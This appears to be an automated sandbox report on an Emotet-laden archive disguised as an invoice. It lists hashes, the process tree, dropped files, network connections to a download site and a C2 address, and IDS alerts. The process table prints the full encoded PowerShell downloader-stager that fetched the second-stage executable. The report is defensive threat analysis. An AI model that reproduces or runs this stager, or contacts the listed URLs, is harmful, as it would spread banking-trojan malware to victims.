File name: | Factura _ HAS834685.7z |
Full analysis: | https://app.any.run/tasks/985894c8-8c7c-46b8-88d7-f5cec3592000 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | March 21, 2019, 20:26:01 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-7z-compressed |
File info: | 7-zip archive data, version 0.4 |
MD5: | E6C16FC121EE1CA12C7ABE3983552020 |
SHA1: | 3D7A73416BE409F02A84FEDAA127D1EEB0B2111E |
SHA256: | D4A0BCBF2508F697BD1568F22A12B4F8CC8BC1871ACBB7414FFC9922D0642A5A |
SSDEEP: | 1536:RT0SR+oaBRySe4S8ZVCEzXq6dw3ZTzElswg1DKgBUX++SdBcLCq:V/RpaBRiEV4j32Vg1mOUX+xsmq |
.7z | | | 7-Zip compressed archive (v0.4) (57.1) |
---|---|---|
.7z | | | 7-Zip compressed archive (gen) (42.8) |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1896 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Factura _ HAS834685.7z" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
1916 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIb1896.3121\Factura _ HAS834685.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | WinRAR.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
2860 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Facture_Num_HAS834685.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
1548 | powershell -e IAAoAG4ARQBXAC0ATwBiAEoAZQBjAFQAIAAgAEkAbwAuAEMAbwBNAFAAcgBlAFMAUwBJAG8ATgAuAEQAZQBmAGwAQQB0AEUAUwBUAFIARQBBAG0AKAAgAFsAcwB5AHMAVABlAE0ALgBpAE8ALgBNAEUATQBPAFIAeQBTAHQAUgBlAGEATQBdACAAWwBTAFkAcwBUAGUAbQAuAGMAbwBuAFYAZQBSAFQAXQA6ADoARgByAG8ATQBCAGEAcwBlADYANABTAFQAUgBJAG4ARwAoACgAJwBYAGQAQgAnACsAJwBiACcAKwAnAGEAOQBzAHcARgBBAEQAZwB2ACcAKwAnADYAJwArACcASQBIAGcAeABLAHkAVwBIAFUAeABoACcAKwAnAGQAVQAnACsAJwBZAGUAaABJAHoATAA5AEMAJwArACcATgAnACsAJwBtAHUAJwArACcARQAnACsAJwAxAG0ARQBHACcAKwAnAFEAJwArACcAbAAnACsAJwBlAE4ATAAnACsAJwA1AFUAJwArACcAagBHAFYAcQBvADAAJwArACcASQAnACsAJwBmACcAKwAnADkAOQBXAHQAWQBMAG0AOQAnACsAJwA2AE8AKwBNADcAVgAnACsAJwBFADcAQwAnACsAJwB3ACcAKwAnAE4AbwBPAFkAdABpAEYAcwAnACsAJwBiAEEAJwArACcAbwAnACsAJwBMACcAKwAnAEcAbgBrACcAKwAnAFcAZwBvAFcAQQBBAG0ASwBGAGQAcQA3AEwASgB4AFMARwAnACsAJwBmAEUAZgBqACcAKwAnAFAAMgAnACsAJwBLADUANwBGAHAAVQBKAHYASwBPAHkAMAB5ACcAKwAnAEsAeABLACcAKwAnAFUAMQB4AHYAUwAnACsAJwAzAGoAJwArACcARgBsACcAKwAnAHIAZgBWAEgAJwArACcAdQBlAEkAMQBLAHYAJwArACcAUABoACcAKwAnAEMANwA1ACcAKwAnAGoAdAA1ADAASQByADQAJwArACcAegAnACsAJwBSAEwAKwAzAFgAJwArACcANQBjACcAKwAnADgALwB1ACcAKwAnAC8AdAAnACsAJwBqAHgARgAnACsAJwBUACcAKwAnAGYAeQA2ACcAKwAnAHYAcgBtAEEAcQArAFAAJwArACcANAA5AE8AdQBsACcAKwAnAE0AeABXACcAKwAnADEAZgAnACsAJwBJAC8AJwArACcAdwA5AFcAMgAzAEwAZQBkADQAWAAnACsAJwAwAC8AJwArACcAWAB1ACcAKwAnAHcAZwAnACsAJwBxAHIAJwArACcASgBsAFgANwAnACsAJwArAEYAJwArACcAMwAnACsAJwBWAC8AJwArACcAcABZAE0AZQAnACsAJwBIAGQAaAAnACsAJwB4ADUAJwArACcAMwAnACsAJwAvAEIAJwArACcAaAB4AHkAJwArACcAKwBvADAAcQBWACcAKwAnAGkAJwArACcAOQAnACsAJwAyACcAKwAnAEQAJwArACcARgAnACsAJwB1ACcAKwAnADYAbABSAEQAegAnACsAJwBYACcAKwAnAEsAZABzACcAKwAnAFQAJwArACcAaAAnACsAJwBJACcAKwAnAGcAeQBPAGgAJwArACcAbQBWAG0AJwArACcAegBhACcAKwAnAGoAJwArACcALwAnACsAJwBvACsAOQBhAE0ANgBGADMAZAAnACsAJwBCACcAKwAnAHAANQBBACcAKwAnAEIAdAAnACsAJwBZAEwAJwArACcAeQBHAEkANgBUAEUAQgBBAE8AdABPAGMAUgAnACsAJwA4ACcAKwAnAFUARQBCAFEAawBKAHYAJwArACcAUgB6AGUATwBQAGkAJwArACcAcgBjADYATABKAEgAUgA3ACcAKwAnAEEANgBSAEoAJwArACcAbAB1ACcAKwAnAFgAdQBxACcAKwAnADAAOABGACcAKwAnAEIAJwArACcATwBzAHMAOQBsAEEAOQAnACsAJwAzACsANQBkACcAKwAnAGkAMwA3ACcAKwAnAFEAVgBkACcAKwAnAHYAaAAnACsAJwBqACcAKwAnAFAANgBpAHMAOQBjAEMAJwArACcATQArAHIAagBBACcAKwAnAFcAbAAnACsAJwBVADYAUQBHADUAYQAnACsAJwBDACcAKwAnAGEAZQBnAGwAeABxACcAKwAnAEMAVABsAHAAJwArACcARgBYAGsAJwArACcANwA1AHYAJwArACcAUgAnACsAJwBrACcAKwAnAGgAcABmACcAKwAnAFQAKwAnACsAJwAvACcAKwAnAFgAOQBSAEYAdgAnACsAJwBWAGEAYgA3ADkANABvAHAAOQAnACsAJwBaAEgAJwArACcAdwBpAGIAeAAzAGQAeABEAHcASgBvAEEAaABqAFcAbwAnACsAJwBnACcAKwAnAEEAJwArACcARABuAGwAYQAnACsAJwAwAEcAJwArACcAaABWAGsAYwAnACsAJwBrAGsAJwArACcAUgBUAE4AZgBHACcAKwAnAGQAeAA5ACcAKwAnAFUATAA5AEQAVgBaACcAKwAnAHUAJwArACcARwAnACsAJwB6AEcAJwArACcAcwBrACcAKwAnADQAWgBWADcAJwArACcAVQAzAEoAYQAnACsAJwBxAFcAYwB0ADgAVgA4ACcAKwAnAFkAZQBRACsANQBEAEUAJwArACcAQwAnACsAJwA0AEIAVQBOAFkAeQBBADIATgBTAGoAJwArACcAZQB4ACcAKwAnAGoAJwArACcATQA1AG4AdwBZADEAJwArACcAbwBUACcAKwAnAHUAZQB6ADkAJwArACcANQBoAEIAJwArACcAbgBzAGkAJwArACcAWQBwAHAARABEAEEAUQBTAE4AZgBnAE0APQAnACkAIAApACwAIABbAHMAWQBTAFQARQBNAC4AaQBPAC4AQwBvAE0AcABSAEUAcwBzAEkAbwBuAC4AYwBPAG0AcABSAGUAUwBzAEkATwBOAE0AbwBkAEUAXQA6ADoARABlAEMAbwBNAHAAcgBlAHMAUwApACAAfAAgAEYAbwByAEUAQQBjAGgALQBvAEIAagBlAEMAVAB7ACAAbgBFAFcALQBPAGIASgBlAGMAVAAgAGkAbwAuAHMAdABSAGUAQQBNAHIARQBhAGQARQByACgAJABfACAALABbAHQARQB4AFQALgBlAG4AQwBvAEQAaQBuAEcAXQA6ADoAYQBTAEMAaQBpACkAfQApAC4AcgBlAEEAZAB0AE8AZQBuAEQAKAApACAAfAAgACYAIAAoACAAJABTAGgAZQBMAEwASQBkAFsAMQBdACsAJABzAGgARQBsAGwASQBkAFsAMQAzAF0AKwAnAHgAJwApAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2252 | "C:\Users\admin\946.exe" | C:\Users\admin\946.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Description: Windows 8 Toast Notification Exit code: 0 Version: 8,6,0,1000 | ||||
1628 | --21281139 | C:\Users\admin\946.exe | 946.exe | |
User: admin Integrity Level: MEDIUM Description: Windows 8 Toast Notification Exit code: 0 Version: 8,6,0,1000 | ||||
3528 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | 946.exe | |
User: admin Integrity Level: MEDIUM Description: Windows 8 Toast Notification Exit code: 0 Version: 8,6,0,1000 | ||||
1360 | --9bc43e78 | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | wabmetagen.exe | |
User: admin Integrity Level: MEDIUM Description: Windows 8 Toast Notification Version: 8,6,0,1000 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2860 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRC064.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1548 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X4FXUODOD42Z39M09849.temp | — | |
MD5:— | SHA256:— | |||
2860 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Facture_Num_HAS834685.doc.LNK | lnk | |
MD5:0926F8C0689D0EA52D9DDD8BC1B8B44E | SHA256:CA5A35FFFEA2E3BEA733FCBCE3B7FDCAE1E84A853D09E5530D1D44FDA19A33B7 | |||
1916 | WinRAR.exe | C:\Users\admin\Desktop\Facture_Num_HAS834685.doc | document | |
MD5:136649E1060ED7E4A22957CE286BADCA | SHA256:D31C266BBB5CA7FDF75A87BB226657F5B6A5B06D5E819C9C55594D723809E709 | |||
1548 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:7100C9D54A32DFE02751A9E1BC41F804 | SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C | |||
2860 | WINWORD.EXE | C:\Users\admin\Desktop\~$cture_Num_HAS834685.doc | pgc | |
MD5:36FFAE3E79C5E8A9EA9F68C2EC6B9BDC | SHA256:17346003BA6FC038C9371D948C69AAAC24A9D6E6C638E5FE949A8D4720829B05 | |||
2860 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:A8BFC06F76815570CE78C51AA23DCFC1 | SHA256:83E229F849F4757E54760D818EF65772207AFAC66A4224FE2C9BFEBCB2358F35 | |||
1548 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF10d0a0.TMP | binary | |
MD5:7100C9D54A32DFE02751A9E1BC41F804 | SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C | |||
2860 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:548B06B0C4AC2FB378E8518DF29DB057 | SHA256:CBCB295058CF7D76837FCC41AFA5D3D09927E2228AEEC52F4EAEC79FFF0BEB63 | |||
2860 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:B9300A047D2FDAB2305A3B0C62A53DDD | SHA256:A3900EE836B926627F2EC98A2A16C214821F0207B927047C5B9C74650CFF8737 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1548 | powershell.exe | GET | 200 | 192.99.175.156:80 | http://www.cbmagency.com/wp-content/GpXbVu/ | CA | executable | 352 Kb | suspicious |
1360 | wabmetagen.exe | POST | 200 | 189.250.145.98:443 | http://189.250.145.98:443/prep/splash/ringin/merge/ | MX | binary | 132 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1360 | wabmetagen.exe | 189.250.145.98:443 | — | Uninet S.A. de C.V. | MX | malicious |
1548 | powershell.exe | 192.99.175.156:80 | www.cbmagency.com | OVH SAS | CA | suspicious |
Domain | IP | Reputation |
---|---|---|
www.cbmagency.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
1548 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
1548 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
1548 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
1360 | wabmetagen.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |